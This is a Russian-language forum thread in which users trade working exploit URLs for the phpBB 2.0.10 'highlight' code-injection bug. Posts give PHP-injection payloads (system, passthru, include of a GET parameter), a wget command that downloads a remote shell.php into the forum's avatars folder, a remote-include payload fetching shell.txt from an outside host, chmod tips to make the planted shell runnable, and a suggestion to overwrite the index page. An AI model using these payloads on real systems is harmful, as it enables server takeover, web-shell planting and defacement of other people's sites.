|
highlight
В общем, необходимо взломать форум phpbb 2.0.10 путём эксплуатации баги в highlight.
Мне не нужно взламывать конкретный форум, просто хочу научиться использовать эту багу. Вот что я пробовал: Код:
http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`pwd`.%2527Код:
/pub/home/taymen30/сайт/forumКод:
http://сайт/forum/viewtopic.php?p=337&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd%20..;ls%20-lВ чём я делаю ошибку?Может кто поможет... |
viewtopic.php?t=275&cmd=ls&highlight='.passthru($H TTP_GET_VARS[cmd]).'
|
k1borg, спасибо! Ты мне помог, опираясь на твою подсказку я нашёл де-то на других форумах другой код. Но теперь возникла другая проблема. Например, делаю такой запрос:
Код:
http://форум/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=ls%20-l%20/usr/home/сайт/public_html/директория форума/imagesДелаю запрос: Код:
http://сайт/viewtopic.php?p=228&highlight=%2527.system($_GET[cmd]).include%2527&cmd=wget%20http://мой сайт.narod.ru/shell.php%20-P%20/usr/home/сайт/public_html/форум/images/avatars/ |
Всё, народ, справился сам...только одно не получается:я когда закачиваю шелл на форум, то у него права становятся: -rw-------
То есть открыть его я не могу. Что мне делать-то? Нужно чтобы права стали: -rw-rw---- Закачиваю fetch'ем |
chmod 755 shell.php
|
Че за....
Че за белеберда коглда я ввожу:&highlight=%2527.$poster=`$cmd`.%2527&cmd=cd ..;ls -l
Получаю: )\b#i |
попробуй воспользоваться поиском по форуму, уверен тем с таким содержанием не один десяток, а так возможно запрешено выполнение системных команд в php, пробуй инклюдинг - &test=http://site.com/shell.txt?&highlight=%2527.include($_GET[test]).%2527
|
Цитата:
Цитата:
|
Попробуй залить GET'ом или fetch'ем.
|
Делай echo в индекс на крайняк и всё.
|
| Время: 00:57 |